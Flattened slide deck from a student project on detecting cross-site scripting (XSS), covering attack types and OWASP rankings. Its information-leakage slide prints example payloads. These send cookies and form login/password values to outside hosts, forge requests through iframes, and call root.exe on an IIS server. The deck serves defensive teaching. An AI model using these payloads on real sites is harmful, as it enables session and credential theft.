Cross Side Scripting (XSS) attack detection for web application http://sourceforge.net/projects/xssalert7/ Author: Arjun Jain (07104701) Department of Computer Science and Information Technology Jaypee Institute of Information Technology Sector-62 Noida ,Uttar Pradesh
Agenda Overview of XSS attack Type of XSS attack Example Limitation of attack DOM security overview XSS alert working model Demo
What is Cross Side Scripting (XSS)Cross-site scripting (XSS) is a type of computer security vulnerability typically foundin web applications that enables malicious attackers to inject client side script intoweb pages viewed by other.Types:1: Reflected XSS2: Stored XSS3: DOM based XSS
Ranked #1 in OWASP 2007 top 10 Ranked #2 in OWASP 2010 top 10 7 out of 10 sites have XSS ( Jeremiah Grossman, White Hat website security statistics report, Oct 2007 )
Stored XSSIt refers to all XSS vulnerabilities, where the adversary is able to permanently injectthe malicious script in the vulnerable application storage . The result is every userthat accesses the poisoned web page received the injected script without furtheraction by the adversary.
Invalidated input in XSSInvalidated Input and resulted in a Cross-Site Scripting attackand the theft of the administrator’s Cookies.
Types of Information leakageClient can reveal cookies to 3rd party (session state, order info, etc)http://host/a.php?variable="><script>document.location=http://www.cgisecurity.com/cgi-bin/cookie.cgi?%20+document.cookie</script >Client can reveal posted form items to 3rd party (userID/passwd, etc)<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image;hackImg.src=http://www.malicioussite.com/+document.forms(1).login.value+:+document.forms(1).password.value;" </form>Client can be tricked into accessing/posting spoofed info to trusted serverwww.trustedserver.com/xss.asp?name =<iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>Client can be tricked into attacking other sites/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>
Limitation of these attacks Usually only get one transaction with XSS code against vulnerable site Most attacks are only focused on collecting cookies POST based forms are seldom leveraged – almost always use GET methods Attacker does not know actual responses to client Some experts recommend using POST, hidden form inputs and other session state info to limit XSS risks.